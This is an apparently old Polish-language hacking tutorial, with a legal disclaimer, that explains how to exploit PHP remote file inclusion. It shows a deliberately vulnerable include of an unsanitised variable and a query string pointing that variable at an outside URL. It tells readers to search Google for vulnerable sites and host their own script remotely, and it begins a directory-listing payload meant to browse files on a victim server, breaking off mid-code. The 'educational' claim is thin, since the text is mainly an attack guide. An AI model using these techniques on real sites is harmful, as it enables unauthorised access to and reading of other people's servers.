php.doc

MUSZE TO NAPISAC. WIEC NIE PONOSZE ZADNEJ ODPOWIEDZIALNOSCI PRAWNEJ ZA
MATERIALY W TTYM ARCIE.
SLUZY ON JEDYNIE DO CELUW EDUKACYJNYCH I INFORMACYJNYCH. WSZYSTKO ROBICIE NA WLASNA        
ODPOWIEDZIALNOSC. ZA SZKODY WYZADZONE PRZEZ DZIECI ODPOWIADAJA RODZICE.                    



1.  wSTEP (oczym bedzie faq).
1.1 Dlaczego ten temat.      
1.2 Pomagali...              
2.  Pierwsze kroki.          
2.1 co bedzie potrzebne.      
3.  Krorko o php.            
4.  Jak to wykorzystac.      
5.  Greetz.                  


1. Wiec zaczne od tego ze powiem krotko jak sie stalo ze napisalem tego arta.

Zaczelo sie to w tedy kiedy sciagalem sobie delphi.. i wpadlem na pomytsl alternatywny do pomyslu
Vee i DarkSpirita. a mianowicie jak wykozystac bug w php do przejzenia plikow na serverze z
prawami uzytkownika ftp.

1.1. Dlaczego??!! hmm. moze dlatego ze ludzie powinni wiedziec jak sie zabespieczyc przed tego
typu atakiem.

1.2. pomagalo sporo osob. zwlascza admini dziorawych stron.

2. Pierwsze kroki.

Zaczynamy zabawe.Pierwsza zecza jaka mozemy zrobic jest znalezienie shella z lynx lub inna przegladarka
pod konsole. pozniej na swoim kompie odpalamy www.google.pl i szukamy stron ktore moga miec dziory.
nie bede pisal jak to zrobic sami do tego dojdziecie.

2.1 Potrzebne nam beda:

Notatnik (lub inny program. moze byc taki ktory koloruje skladnie)  
server php na localu lub gdzies w necie.                            
konto np. na republice.                                            
cierpliwosc.                                                        


3. Php jest jezykiem scryptowym (server side) czyli po stronie servera. najwiekszym bledem jaki
popelnia webmaster jest zrobienie scryptu ktory umozliwia zdalne odpalenie scryptu na serverze
z dzriorawym kodem.

Przyklad:

<?php
include("$action");
?>

I co widzimy? a no widzimy ze plik ma zmienne nie przypozadkowana do niczego.
Czyli? Mozemy zrobic cos takiego:

plik_z_tym_kodem.php?action=http://onet.pl

Co sie stanie?? W miejscu gdzie znajduje sie "include("$action");" pojawi sie strona onet.pl
A co to nam daje?? Daje nam dosc duzo. mozemy bez problemy odpalic swoj scrypt na serverze ktory
zamierzamy ogldac.

4. Wykorzystanie tego typu bledu jest niewiarygodnie proste. Tworzymy scrypt ktoy umozliwi nam przegldanie
plikow na serverze. tzn. taki ktory pokaze nam jakie znajduja sie tam pliki i jakie maja rozszezenia.
Moj scrypt jest dosc skomplikowany i niedporacowany i ma sporo linijek nikomu do niczego niepotrzebnych
ale najwazniejsze ze spelnia swoje zadanie.


Przyklad:

<form method=post>                                                        
<input type=text name=folder size=20>                                      
<input type=submit value=jaki_Katalog><BR><BR><BR>                        
<?php                                                                      
function katalog($k)                                                      
     {                                                          
              $ext = array('.','..');                                    
            $handle = dir($k);           ...